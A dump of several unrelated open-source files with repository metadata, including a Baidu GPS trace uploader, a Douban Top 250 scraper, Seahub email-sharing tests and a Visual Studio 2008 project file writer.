CONFIG_URL = 'http://api.map.baidu.com/trace/v2/track/addpoint'
def time_to_unix(time_str):
"""
    Convert a time string to a UNIX timestamp.
:param time_str: str 'year month day hour minute sec' in decimal
:return: int(UNIX_TIMESTAMP)
"""
try:
s = time.mktime(time.strptime(time_str, '%Y %m %d %H %M %S'))
return int(s)
except Exception as e:
return None
##INPUT: str or int(unix timestamp)
##output: str 'year month day hour minute sec' in decimal
def unix_to_time(unix_str):
try:
dt = time.localtime(int(unix_str))
return str(' '.join([str(i) for i in dt][:6]))
except Exception as e:
return None
def current_unix():
try:
unix_str = int(time.mktime(time.localtime()))
return unix_str
except Exception as e:
return None
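# Hedged example (added for clarity): time_to_unix('2017 7 27 12 0 0') returns the local-time
# UNIX timestamp for that instant, unix_to_time() maps the timestamp back to the same
# space-separated string, and both helpers return None on malformed input.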
#class GpsUploader(threading.Thread):
class GpsUploader(QThread):
GPSMutex = QMutex()
def __init__(self, updateMainSignal = None, recSignal = None, toPickPointSignal = None):
super(GpsUploader, self).__init__()
self.para = {
'ak':None,
'service_id':None,
'latitude':None, #wei du,double,-90.0~90.0
'longitude':None, #jing du,double, -180-180.0
'coord_type':1,
'loc_time':None, #UNIX time stamp
'entity_name':None}
self.get_ak()
self.points = []
self.updateMainSignal = updateMainSignal
self.recSignal = recSignal
self.toPickPointSignal = toPickPointSignal
#point_tuple: (longitude, latitude, unix_time)
#the element type can be str/int/double
def add_point(self, point_tuple):
#get lock
with QMutexLocker(self.GPSMutex):
self.points.append(point_tuple)
#release the lock
def run(self):
# print(self.hello)
# print (self.para)
#get lock
with QMutexLocker(self.GPSMutex):
up_count = 0
del_count = 0
fail_count = 0
# fail_list = []
if len(self.points) != 0:
for point in self.points:
if self.set_point(long= point[0], lat=point[1]):
if self.upload_one_point():
up_count += 1
else:
fail_count += 1
# fail_list.append(point)
else:
del_count +=1
self.points = []
self.update_main(
'enter-func-GpsUploader-run: ' + str(up_count) + ' uploaded, ' + str(fail_count) + ' failed, ' + str(
del_count) + ' deleted.')
#release lock
# self.points = fail_list
#update to mainwindow
def update_main(self, str_arg):
self.updateMainSignal.emit(str_arg)
print(str_arg)
def get_ak(self):
try:
with open(CONFIG_PATH, 'r') as data:
for line in data:
temp = line.split(':')
self.para[temp[0]] = temp[1][:-1]
self.para['loc_time'] = current_unix()
print(self.para)
except Exception as e:
print('error-uploader init failed:', e.message)
    def set_point(self, long=None, lat=None, time=None, coord_type=1):
        if long is None or lat is None:
            return False
        else:
            self.para['longitude'] = long
            self.para['latitude'] = lat
            # take the timestamp at call time; a default argument would be evaluated only
            # once, when the method is defined
            self.para['loc_time'] = time if time is not None else current_unix()
            self.para['coord_type'] = coord_type
            return True
def upload_one_point(self):
reply = requests.post(CONFIG_URL, data = self.para).json()
        if reply['status'] == 0:
return True
else:
return False
# def GtoB(self, G_lon, G_lat):
# """
    #     Convert GPS (WGS-84) coordinates to Baidu map coordinates.
    #     :param G_lon: GPS longitude
    #     :param G_lat: GPS latitude
    #     :return: (Baidu longitude, Baidu latitude) or None
# """
# try:
# import json
# import base64
# url = 'http://api.map.baidu.com/ag/coord/convert?from=0&to=4&x=%s&y=%s' % (str(G_lon), str(G_lat))
# source_code = requests.get(url)
# plain_text = source_code.text
# c = json.loads(plain_text)
# if c['error'] == 0:
# return (base64.decodestring(c['x']), base64.decodestring(c['y'])) # lat,lon in string type
# else:
# return None
# except Exception as e:
# print('error in GtoB:', e.message)
# return None
if __name__ == '__main__':
test_p = [
('120.13143165691','30.272977524721' ),
('120.13143165690','30.272977524720' ),
('120.13143165689','30.272977524719' ),
('120.13143165688','30.272977524718' ),
('120.13143165687','30.272977524717' ),
]
c = GpsUploader()
for p in test_p:
c.add_point(p)
c.start()
|
[
"[email protected]"
] | |
4b3a9d826820ca989271e40c1f7f39529da12284
|
abe2b440071962ad1f0eaaf34ddfcccafba4b5f8
|
/15_descriptions.py
|
604ea6aea2f8b79fb547797d407d4684c46be0b4
|
[] |
no_license
|
shauseth/converting-bdb-to-48hd
|
f097e253648c9e8d49b539548cb58d5adfb1cb87
|
0c4daba99247d366b0da58b021e8d6a9ec78ae2e
|
refs/heads/master
| 2020-05-18T02:29:28.604783 | 2019-05-21T18:22:05 | 2019-05-21T18:22:05 | 184,116,399 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
# SH-I
import pandas as pd
import os
data = pd.read_csv('second-generation-2.csv')
id_list = []
seq_list = []
for filename in os.listdir('.'):
if filename == 'desc.py':
pass
elif filename == 'second-generation-2.csv':
pass
else:
# get IDs
split = filename.split('_')
id = split[0]
id_list.append(int(id))
# get sequences
file = open(filename, 'r')
seq = file.read()
seq_list.append(seq)
file.close()
id_to_seq = dict(zip(id_list, seq_list))  # avoid shadowing the built-in dict
data['Sequences'] = data['MimotopeSetID'].map(id_to_seq)
print(data)
data.to_csv('second-generation-3.csv', index = False)
|
[
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
|
[
"[email protected]"
] | |
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 747 |
py
|
def occurrences(genome, sub):
"""
:param genome: genome for processing
    :param sub: pattern for which we find the indexes of occurrences
:return: list of indexes
"""
start = 0
indexes = []
while True:
start = genome.find(sub, start)
if start > 0:
indexes.append(start)
else:
break
start += 1
return indexes
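# Hedged example (added for clarity): with the Rosalind BA1D sample data,
# occurrences("GATATATGCATATACTT", "ATAT") returns the 0-based start indexes [1, 3, 9].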
def read_data_from(file_name):
with open(file_name, "r") as file:
pattern = file.readline().strip()
genome = file.readline().strip()
return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
|
[
"[email protected]"
] | |
488814efa60cb7ab1632ed5a4b887fa663a17a55
|
3a6235a79585ed60da42ae6bd69d140c80a5ac4a
|
/Week_01/加1.py
|
06b05dff7e9e38a989632355c6b053e0a9ec6136
|
[] |
no_license
|
Jackson026/AlgorithmQIUZHAO
|
dea6c58d972bc5039e392a16676ad1d60398e1a8
|
09feae0783c8d21bf1b9aaad7fa6917f05ff7162
|
refs/heads/master
| 2022-12-16T23:40:42.151486 | 2020-09-02T07:14:21 | 2020-09-02T07:14:21 | 279,640,530 | 1 | 0 | null | 2020-07-14T16:41:36 | 2020-07-14T16:41:35 | null |
UTF-8
|
Python
| false | false | 650 |
py
|
# A shortcut would be to join the digits into a string, convert to int, add 1 and convert
# back, but that approach does not generalise well, so it is not used here.
# Instead, walk the digits from the end: a 9 becomes 0 and the carry moves left; any other
# digit is simply incremented and the loop stops.
# In the all-nines case (e.g. 999) the loop leaves a leading 0, so a 1 is inserted at the
# head of the list with list.insert(0, 1).
def plusOne(digits):
if not digits:
return digits + [1]
for i in range(len(digits) - 1, -1, -1):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] = digits[i] + 1
break
if digits[0] == 0:
digits.insert(0, 1)
return digits
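# Hedged examples (added for clarity): plusOne([1, 2, 9]) -> [1, 3, 0];
# plusOne([9, 9, 9]) -> [1, 0, 0, 0].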
|
[
"[email protected]"
] | |
152edf169d78c30351a491fd1d68dccb08de71c1
|
a9ee8b29cc753cbcf3167e2741c779ad43ab22a3
|
/api/wsgi.py
|
6a23d3e1ea9a1a6b3e64ad17e9afb8029d5cf9b3
|
[
"MIT"
] |
permissive
|
josecolinapy/fifa-21-api
|
f76f06679be9f696f03ce0f3e6e5be5fc5c4c0f4
|
5ed75b60a8c302ad7d4fde04a07312de18c10b1e
|
refs/heads/main
| 2023-03-18T17:03:31.483890 | 2021-03-14T15:04:56 | 2021-03-14T15:04:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 388 |
py
|
"""
WSGI config for api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
374b46162c7dde768082c279d494fa3a42728b61
|
ff623c438f0089cf23cdb089fde693e340882164
|
/metabase_ngse/hooks.py
|
27e6dd5cb62016922011c60514f74400182b1747
|
[
"MIT"
] |
permissive
|
Suraj787/metabase_ngse
|
eb1de77ff4e86685db0f2f98bb2a8376b5cd654a
|
be626804148650af73bb00926ed9052201274c04
|
refs/heads/master
| 2023-01-04T12:30:51.092201 | 2020-10-31T20:47:27 | 2020-10-31T20:47:27 | 308,969,125 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,154 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "metabase_ngse"
app_title = "Metabase Ngse"
app_publisher = "firsterp"
app_description = "Metabase for Nandan GSE"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "[email protected]"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# app_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js, css files in header of web template
# web_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# web_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "metabase_ngse.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "metabase_ngse.install.before_install"
# after_install = "metabase_ngse.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "metabase_ngse.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
# "metabase_ngse.tasks.all"
# ],
# "daily": [
# "metabase_ngse.tasks.daily"
# ],
# "hourly": [
# "metabase_ngse.tasks.hourly"
# ],
# "weekly": [
# "metabase_ngse.tasks.weekly"
# ]
# "monthly": [
# "metabase_ngse.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "metabase_ngse.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "metabase_ngse.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "metabase_ngse.task.get_dashboard_data"
# }
|
[
"[email protected]"
] | |
209cf4447eef471a6961ceff4174497f1acc3937
|
caa947ea6cbbb44c80f01702a4076708451eaa73
|
/splider_for_douban.py
|
3c00e458a309669504c1bf16436621e9837d16df
|
[] |
no_license
|
lugq1990/chatbot_douban
|
e2696aa56657fda3d4afdc6775390db691df3e9b
|
f7d746dfcdd5ea853e99ad96c7dfe7cebc4b31e8
|
refs/heads/main
| 2023-08-27T01:36:55.246079 | 2021-10-25T07:21:17 | 2021-10-25T07:21:17 | 418,353,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,285 |
py
|
import re
from bs4 import BeautifulSoup
import requests
import time
import os
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
import json
class DoubanSplider:
def __init__(self) -> None:
self.base_top_url = "https://movie.douban.com/top250?start={}&filter="
self.headers = {'User-Agent': 'Mozilla/5.0'}
self.driver = webdriver.Chrome(ChromeDriverManager().install())
def get_response(self, url):
response = requests.get(url, headers=self.headers)
if response.status_code != 200:
print("Get some error from request! As error code is {}".format(response.status_code))
bs = BeautifulSoup(response.content, 'html.parser')
time.sleep(.2)
return bs
def get_response_with_driver(self, url):
self.driver.get(url)
bs = BeautifulSoup(self.driver.page_source, 'html.parser')
time.sleep(.1)
return bs
def get_top250_links(self):
each_page = 25
full_n = 250
res_tuple = []
for i in range(int(full_n/each_page)):
print("Now if page: {}".format(i))
bs = self.get_response_with_driver(self.base_top_url.format(i * each_page))
# find each page items
items = bs.find_all('div', class_='item')
for item in items:
each_item_info = self._get_top_content(item)
res_tuple.append(each_item_info)
return res_tuple
@staticmethod
def save_list_into_file(obj_list, file_name, file_path=None):
if not file_path:
file_path = 'tmp_data'
if file_name.find('.') == -1:
file_name += '.txt'
with open(os.path.join(file_path, file_name), 'w', encoding='utf-8') as f:
for obj in obj_list:
if isinstance(obj, list) or isinstance(obj, tuple):
f.write(','.join(obj) + '\n')
else:
f.write(obj + '\n')
@staticmethod
def _get_top_content(item):
title = item.find(class_='hd').find(class_='title').get_text()
url = item.find(class_='hd').find('a').get('href')
score = item.find_all("span", class_='rating_num')[0].get_text()
n_users = item.find_all("span")[-2].get_text()
return (title, score, n_users, url)
def get_movie_base_info(self):
"""
        get_movie_base_info: uses an open-source API endpoint to fetch sample movie data based on the movie ID.
"""
base_api_url = "https://movie.querydata.org/api?id={}"
# get full ids with movie name
with open(os.path.join('tmp_data', 'top250_link.txt'), 'r', encoding='utf-8') as f:
data_line = f.readlines()
movie_info_dict = {}
for data in data_line:
id = data.split(',')[-1].split("/")[-2]
movie_name = data.split(',')[0]
response = requests.get(base_api_url.format(id)).text
movie_info_dict[movie_name] = response
return movie_info_dict
if __name__ == '__main__':
splider = DoubanSplider()
res_link = splider.get_top250_links()
splider.save_list_into_file(res_link, 'top250_link.txt')
|
[
"[email protected]"
] | |
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 |
Apache-2.0
| 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"[email protected]"
] | |
9d55ea5cb4addbc1cc6d2fe4e49086c6505e4551
|
a75f9cf4f03b01f8e7cc12d311434beca1b233e5
|
/vstools/writers.py
|
fbfa81a2230924a07bc92e36d66720df61542f97
|
[
"Apache-2.0"
] |
permissive
|
libyal/vstools
|
3169dbf62be79eb309f9d23a06e068cb3bd1ed81
|
f251133b39131735576baad2077bc47821e9b99b
|
refs/heads/main
| 2023-04-13T06:54:29.549207 | 2023-04-10T10:41:06 | 2023-04-10T10:41:06 | 95,857,124 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 75,608 |
py
|
# -*- coding: utf-8 -*-
"""Project and solution file writer classes."""
import abc
import re
from vstools import definitions
class FileWriter(object):
"""File writer."""
def __init__(self, encoding='utf-8', end_of_line='\r\n'):
"""Initializes a file writer.
Args:
encoding (str): encoding.
end_of_line (str): end of line.
"""
super(FileWriter, self).__init__()
self._encoding = encoding
self._end_of_line = end_of_line
self._file = None
def Close(self):
"""Closes the project file."""
self._file.close()
def Open(self, filename):
"""Opens the project file.
Args:
filename (str): path of the file.
"""
# Using binary mode to make sure to write Windows/DOS end of lines.
self._file = open(filename, 'wb') # pylint: disable=consider-using-with
def WriteBinaryData(self, data):
"""Writes binary data.
Args:
data (bytes): binary data.
"""
self._file.write(data)
def WriteLine(self, line):
"""Writes a line."""
line = ''.join([line, self._end_of_line])
line = line.encode(self._encoding)
self.WriteBinaryData(line)
def WriteLines(self, lines):
"""Writes lines."""
for line in lines:
self.WriteLine(line)
class VSProjectFileWriter(FileWriter):
"""Visual Studio project file writer."""
def __init__(self, encoding='utf-8', end_of_line='\r\n'):
"""Initializes a Visual Studio project file writer.
Args:
encoding (str): encoding.
end_of_line (str): end of line.
"""
super(VSProjectFileWriter, self).__init__(
encoding=encoding, end_of_line=end_of_line)
@abc.abstractmethod
def WriteFooter(self):
"""Writes a file footer."""
@abc.abstractmethod
def WriteHeader(self):
"""Writes a file header."""
class VS2008ProjectFileWriter(VSProjectFileWriter):
"""Visual Studio 2008 project file writer."""
_CONFIGURATION_OPTIONS = [
('ConfigurationType', 'output_type', False),
('CharacterSet', 'character_set', False),
('ManagedExtensions', 'managed_extensions', True),
('WholeProgramOptimization', 'whole_program_optimization', True),
]
_TOOL_COMPILER_CONFIGURATION_OPTIONS = [
('Optimization', 'optimization', True),
('AdditionalIncludeDirectories', 'include_directories', False),
('PreprocessorDefinitions', 'preprocessor_definitions', False),
('BasicRuntimeChecks', 'basic_runtime_checks', True),
('SmallerTypeCheck', 'smaller_type_check', True),
('RuntimeLibrary', 'runtime_library', False),
('UsePrecompiledHeader', 'precompiled_header', True),
('WarningLevel', 'warning_level', False),
('WarnAsError', 'warning_as_error', True),
('Detect64BitPortabilityProblems',
'detect_64bit_portability_problems', True),
('DebugInformationFormat', 'debug_information_format', True),
('CompileAs', 'compile_as', False),
]
_TOOL_LIBRARIAN_CONFIGURATION_OPTIONS = [
('OutputFile', 'librarian_output_file', False),
('ModuleDefinitionFile', 'librarian_module_definition_file', False),
('IgnoreAllDefaultLibraries', 'librarian_ignore_defaults', False),
]
_TOOL_LINKER_CONFIGURATION_OPTIONS1 = [
# ('AdditionalDependencies', 'additional_dependencies', True),
('OutputFile', 'linker_output_file', True),
('LinkIncremental', 'link_incremental', True),
]
_TOOL_LINKER_CONFIGURATION_OPTIONS2 = [
# ('AdditionalLibraryDirectories', 'library_directories', False),
('GenerateDebugInformation', 'generate_debug_information', True),
('SubSystem', 'sub_system', True),
('OptimizeReferences', 'optimize_references', True),
('EnableCOMDATFolding', 'enable_comdat_folding', True),
('RandomizedBaseAddress', 'randomized_base_address', True),
('DataExecutionPrevention', 'data_execution_prevention', True),
('TargetMachine', 'target_machine', True),
('ImportLibrary', 'import_library', True),
]
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2008ProjectFileWriter, self).__init__()
self._version = 2008
def _WriteConfiguration(self, project_configuration):
"""Writes the project configuration.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine('\t\t<Configuration')
self.WriteLine('\t\t\tName="{0:s}|{1:s}"'.format(
project_configuration.name, project_configuration.platform))
self.WriteLines([
'\t\t\tOutputDirectory="$(SolutionDir)$(ConfigurationName)"',
'\t\t\tIntermediateDirectory="$(ConfigurationName)"'])
for definition, name, is_optional in self._CONFIGURATION_OPTIONS:
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 3)
self.WriteLine('\t\t\t>')
tools = [
('VCPreBuildEventTool', []),
('VCCustomBuildTool', []),
('VCXMLDataGeneratorTool', []),
('VCWebServiceProxyGeneratorTool', []),
('VCMIDLTool', []),
('VCCLCompilerTool', self._TOOL_COMPILER_CONFIGURATION_OPTIONS),
('VCManagedResourceCompilerTool', []),
('VCResourceCompilerTool', []),
('VCPreLinkEventTool', []),
]
# TODO: add "librarian values set" to project configuration?
if project_configuration.librarian_output_file:
tool = ('VCLibrarianTool', self._TOOL_LIBRARIAN_CONFIGURATION_OPTIONS)
tools.append(tool)
for name, configuration_options in tools:
self._WriteConfigurationTool(
project_configuration, name, configuration_options)
if project_configuration.linker_values_set:
self._WriteConfigurationLinkerTool(project_configuration)
tools = [('VCALinkTool', [])]
if project_configuration.linker_values_set:
tools.append(('VCManifestTool', []))
tools.extend([
('VCXDCMakeTool', []),
('VCBscMakeTool', []),
('VCFxCopTool', [])
])
if project_configuration.linker_values_set:
tools.append(('VCAppVerifierTool', []))
tools.append(('VCPostBuildEventTool', []))
for name, configuration_options in tools:
self._WriteConfigurationTool(
project_configuration, name, configuration_options)
self.WriteLine('\t\t</Configuration>')
def _WriteConfigurationLinkerTool(self, project_configuration):
"""Writes the project configuration linker tool.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationToolHeader('VCLinkerTool')
if project_configuration.additional_dependencies:
self.WriteLine('\t\t\t\tAdditionalDependencies="{0:s}"'.format(
' '.join(sorted(project_configuration.additional_dependencies))))
for definition, name, is_optional in (
self._TOOL_LINKER_CONFIGURATION_OPTIONS1):
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
library_directories = ['"$(OutDir)"']
library_directories.extend(project_configuration.library_directories)
library_directories = ';'.join(library_directories)
self.WriteLine('\t\t\t\tAdditionalLibraryDirectories="{0:s}"'.format(
library_directories))
for definition, name, is_optional in (
self._TOOL_LINKER_CONFIGURATION_OPTIONS2):
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
self._WriteConfigurationToolFooter()
def _WriteConfigurationOption(
self, project_configuration, definition, name, is_optional,
indentation_level):
"""Parses a configuration option.
An optional configuration option will not be written when its configuration
value is not set.
Args:
project_configuration (VSProjectConfiguration): project configuration.
definition (str): definition of the configuration value in file.
name (str): name of the configuration value in the project information.
is_optional (bool): True if the configuration option is optional.
indentation_level (int): indentation level.
"""
configuration_value = getattr(project_configuration, name, '')
if name == 'include_directories':
configuration_value = ';'.join(configuration_value)
if not is_optional or configuration_value:
indentation = '\t' * indentation_level
line = '{0:s}{1:s}="{2:s}"'.format(
indentation, definition, configuration_value)
self.WriteLine(line)
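  # Hedged example (added for clarity): with definition='CharacterSet', name='character_set',
  # a configuration value of '1' and indentation_level=3, the method above writes the line
  # '\t\t\tCharacterSet="1"'.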
def _WriteConfigurationTool(
self, project_configuration, name, configuration_options):
"""Writes a project configuration tool.
Args:
project_configuration (VSProjectConfiguration): project configuration.
name (str): name of the tool.
configuration_options (list[tuple[str, str, bool]]): configuration
options defined as a tuple of definition, name and is optional.
"""
self._WriteConfigurationToolHeader(name)
# pylint: disable=redefined-argument-from-local
for definition, name, is_optional in configuration_options:
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
self._WriteConfigurationToolFooter()
def _WriteConfigurationToolFooter(self):
"""Writes the project configuration tool footer."""
self.WriteLine('\t\t\t/>')
def _WriteConfigurationToolHeader(self, name):
"""Writes the project configuration tool header.
Args:
name (str): name of the tool.
"""
self.WriteLines([
'\t\t\t<Tool',
'\t\t\t\tName="{0:s}"'.format(name)])
def _WriteHeaderFiles(self, header_files):
"""Writes the header files.
Args:
header_files (list[str]): header filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Header Files"',
'\t\t\tFilter="h;hpp;hxx;hm;inl;inc;xsd"',
'\t\t\tUniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"',
'\t\t\t>'])
for filename in header_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def _WriteResourceFiles(self, resource_files):
"""Writes the resource files.
Args:
resource_files (list[str]): resource filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Resource Files"',
('\t\t\tFilter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;'
'resx;tiff;tif;png;wav"'),
'\t\t\tUniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"',
'\t\t\t>'])
for filename in resource_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def _WriteSourceFiles(self, source_files):
"""Writes the source files.
Args:
source_files (list[str]): source filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Source Files"',
'\t\t\tFilter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"',
'\t\t\tUniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"',
'\t\t\t>'])
for filename in source_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def WriteConfigurations(self, project_configurations):
"""Writes the configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine('\t<Configurations>')
for project_configuration in project_configurations.GetSorted():
self._WriteConfiguration(project_configuration)
self.WriteLine('\t</Configurations>')
self.WriteLines([
'\t<References>',
'\t</References>'])
# pylint: disable=unused-argument
def WriteDependencies(self, dependencies, solution_projects_by_guid):
"""Writes the dependencies.
Args:
dependencies (list[str]): GUIDs of the dependencies.
solution_projects_by_guid (dict[str, VSSolutionProject]): projects
per lower case GUID.
"""
return
def WriteFiles(self, source_files, header_files, resource_files):
"""Writes the files.
Args:
source_files (list[str]): source filenames.
header_files (list[str]): header filenames.
resource_files (list[str]): resource filenames.
"""
self.WriteLine('\t<Files>')
self._WriteSourceFiles(source_files)
self._WriteHeaderFiles(header_files)
self._WriteResourceFiles(resource_files)
self.WriteLine('\t</Files>')
self.WriteLines([
'\t<Globals>',
'\t</Globals>'])
def WriteFooter(self):
"""Writes a file footer."""
self.WriteLine('</VisualStudioProject>')
def WriteHeader(self):
"""Writes a file header."""
